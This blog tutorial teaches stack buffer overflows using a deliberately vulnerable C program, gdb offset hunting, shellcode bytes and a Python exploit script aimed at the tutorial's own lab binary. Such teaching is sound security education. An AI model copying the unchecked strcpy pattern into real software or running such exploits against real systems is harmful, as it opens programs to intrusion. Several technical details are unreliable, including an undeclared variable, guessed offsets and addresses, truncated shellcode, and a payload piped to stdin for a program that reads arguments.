Ethical Hacking #buffer overflow#binary exploitation#pwn

Buffer Overflows Explained: From Concept to Beginner Exploit

Understand buffer overflows: memory layout, stack-based exploitation, shellcode basics, and practical gdb debugging techniques.

April 3, 2026 12 min read

Buffer overflow attacks are some of the oldest yet most fundamental security vulnerabilities. While modern operating systems have added protections (ASLR, stack canaries, DEP), understanding buffer overflows is essential for mastering low-level security concepts and binary exploitation.

This article explains the mechanics, walk through a simple vulnerable program, and show how attackers exploit it.

What Is a Buffer Overflow?

A buffer overflow occurs when a program writes more data to a buffer than it can hold, overwriting adjacent memory. This can corrupt data, crash the program, or execute arbitrary code.

Simple example:

#include <string.h>

int main() {
    char buffer[10];          // 10-byte buffer
    strcpy(buffer, input);    // Copy user input
    return 0;
}

If input is 20 bytes, strcpy writes 20 bytes into 10 bytes of space. The extra 10 bytes spill into adjacent memory.

What gets overwritten depends on memory layout.

Memory Layout (The Foundation)

Understanding where data lives in memory is crucial. A program’s memory is organized:

High Memory Addresses
    ↑
    ├─ [Stack] ← grows downward
    │  ├─ Local variables
    │  ├─ Function parameters
    │  ├─ Return address ← CRITICAL: Where function returns to
    │  └─ Saved frame pointer
    │
    ├─ (unused space)
    │
    ├─ [Heap] ← grows upward
    │  └─ Dynamically allocated memory
    │
    ├─ [BSS Segment]
    │  └─ Uninitialized global/static variables
    │
    ├─ [Data Segment]
    │  └─ Initialized global/static variables
    │
    └─ [Code/Text]
       └─ Program instructions

Low Memory Addresses

Critical insight: The return address is stored on the stack. If we overflow a buffer on the stack, we can overwrite the return address.

Stack-Based Buffer Overflow

This is the most common type. When a function returns, it reads the return address from the stack and jumps there. If we overwrite that address with our code’s address, we redirect execution.

Vulnerable Program Example

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[20];
    strcpy(buffer, input);  // VULNERABLE: No bounds checking
    printf("You entered: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    printf("Program completed successfully\n");
    return 0;
}

Save as vulnerable.c and compile (disable protections for learning):

gcc -fno-stack-protector -z execstack vulnerable.c -o vulnerable
# -fno-stack-protector: Disable stack canary
# -z execstack: Make stack executable

Normal Execution

./vulnerable "hello"
You entered: hello
Program completed successfully

Buffer Overflow - Crash

Input longer than 20 bytes causes crash:

./vulnerable "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

The extra ‘A’s overwrite the return address, pointing to invalid memory. Program crashes.

Finding the Offset

To exploit this, we need to know:

Buffer size: 20 bytes
Offset to return address: How many bytes before we reach the return address?

Use GDB (debugger) to find it:

gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*30)")

Program crashes. Get a core dump:

(gdb) bt
#0  0x41414141 in ?? ()
#1  0x00007fff... in ?? ()

The 0x41414141 (hex for ‘AAAA’) shows the return address is overwritten with ‘A’s.

Determining exact offset:

Create a pattern that’s easier to locate:

python3 -c "import string; import itertools; \
  s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
  print(s[:50])"
# Output: aabacadaeafagahaiajakaalamanapaqarasatauavawaxayaz...

Run with pattern:

(gdb) run $(python3 -c "import string; import itertools; \
  s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
  print(s[:100])")

Check registers:

(gdb) info registers rsp rip
rip            0x61706b61          0x61706b61

The value 0x61706b61 is part of our pattern. Count where it appears.

Simpler approach: Use trial and error.

24 bytes: Crash with offset near answer
28 bytes: Return address overwritten
32 bytes: Confirmed offset

Through testing, offset = 28 bytes.

Crafting the Exploit

Now that we know the offset, we can control the return address.

python3 << 'EOF'
# 28 bytes of padding + 8 bytes for return address (64-bit)
offset = 28
return_address = 0x0000555555554999  # Address of injected code
payload = b'A' * offset + return_address.to_bytes(8, 'little')
print(payload)
EOF

But where does the return address point?

Without ASLR and DEP, the shellcode can go on the stack itself.

Shellcode

Shellcode is machine code that executes a shell or other commands. For x86-64 Linux:

; Minimal exit shellcode (0 bytes exit code)
mov rax, 60    ; syscall number for exit
xor edi, edi   ; exit code = 0
syscall

; In hex: 48c7c03c000000 (mov) + 4831ff (xor) + 0f05 (syscall)
; Total: \x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05

More useful: execve syscall (spawn /bin/sh):

; execve("/bin/sh", NULL, NULL) syscall
mov rax, 59          ; execve syscall
lea rdi, [rel binsh] ; /bin/sh string
xor rsi, rsi         ; argv = NULL
xor rdx, rdx         ; envp = NULL
syscall

; Precomputed: \x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\x0e\x00\x00\x00...

Finding Protections

Before exploiting, check what protections are enabled:

checksec --file=vulnerable
    Arch:     amd64-64-bit
    RELRO:    Partial
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No
    RWX:      Has RWX segments

Stack: No canary: Good! Stack overflow not detected.
NX: NX disabled: Good! Stack is executable.
PIE: No: Good! Addresses are predictable.

In a real program with modern protections, exploitation is much harder.

Complete Exploit Example

Given the vulnerable program and our analysis:

#!/usr/bin/env python3
import subprocess
import sys

offset = 28  # Bytes to return address
shell_addr = 0x7ffffffde000 + 1000  # Approximate stack address (without ASLR)

# Simple shellcode to exit (demo)
shellcode = b'\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05'

# Padding + shellcode + padding to offset + return address pointing to shellcode
payload = shellcode + b'A' * (offset - len(shellcode)) + shell_addr.to_bytes(8, 'little')

# Run vulnerable program with payload
result = subprocess.run(['./vulnerable', payload], capture_output=True)
print(result.stdout.decode())
print(result.stderr.decode())

If successful, the program might crash cleanly (due to our exit syscall) or launch a shell.

Modern Protections (Why This Doesn’t Work in Real Programs)

1. Stack Canary

A random value placed before the return address. If overwritten, program terminates:

// Compiled with -fstack-protector (default in modern systems)
void function() {
    char buffer[20];
    // Compiler adds: uint64_t canary = __stack_chk_guard;
    strcpy(buffer, input);
    // Compiler adds: if (canary != __stack_chk_guard) abort();
}

Overflow the buffer, and the canary check fails before return.

2. Address Space Layout Randomization (ASLR)

Stack, heap, and code addresses randomize on each run:

for i in {1..5}; do
  gdb -batch -ex 'run' -ex 'info proc mappings' ./vulnerable 2>/dev/null | grep stack | head -1
done
# Different addresses each run

Without knowing the exact stack address, returning to shellcode is impossible.

3. Data Execution Prevention (DEP/NX)

Stack is non-executable. Shellcode on the stack won’t run:

checksec --file=vulnerable
NX: NX enabled  # Stack not executable

Shellcode must be in code segment (via ROP gadgets).

Why Learn Buffer Overflows?

Understand memory: Low-level security concepts
CTF competitions: Buffer overflows appear regularly
Legacy systems: Older code lacks protections
Reverse engineering: Recognize overflow patterns
Defense: Know what NOT to do in code

Practical Lab Exercise

Setup a vulnerable program:

# Create vulnerable.c (code above)
gcc -fno-stack-protector -z execstack vulnerable.c -o vulnerable

# Use GDB to find offset
gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*100)")
# Crashes; examine rip register

# Craft payload
python3 -c "print('A'*28 + '\xff\xff\xff\x7f\xff\xff\xff\x7f', end='')" | ./vulnerable
# Program crashes with controlled address

Next level (ROP):

With modern protections, use Return-Oriented Programming (ROP):

Chain small code snippets (gadgets) to build new functionality
Tools: ropper, ropgadget

Conclusion

Buffer overflows are memory corruption vulnerabilities where attackers write beyond allocated buffers and overwrite critical data (return addresses, function pointers, etc.). While modern OSes have mitigated the simplest exploits, understanding buffer overflows is fundamental to binary security.

Every CTF includes at least one overflow challenge. Learn to:

Identify vulnerable code patterns (strcpy, sprintf, gets)
Map memory layout
Calculate offsets
Understand protection mechanisms
Bypass or work around protections

Master buffer overflows, and you’ll understand systems security at its core.

#security fundamentals #CTF #assembly #gdb #pwn #binary exploitation #buffer overflow

// related articles

ethical-hacking Pwntools CTF Guide: Binary Exploitation for Beginners 8 min read ethical-hacking ROP Chains: Bypassing NX/DEP in Binary Exploitation 7 min read ethical-hacking Format String Vulnerabilities: Exploitation Guide 7 min read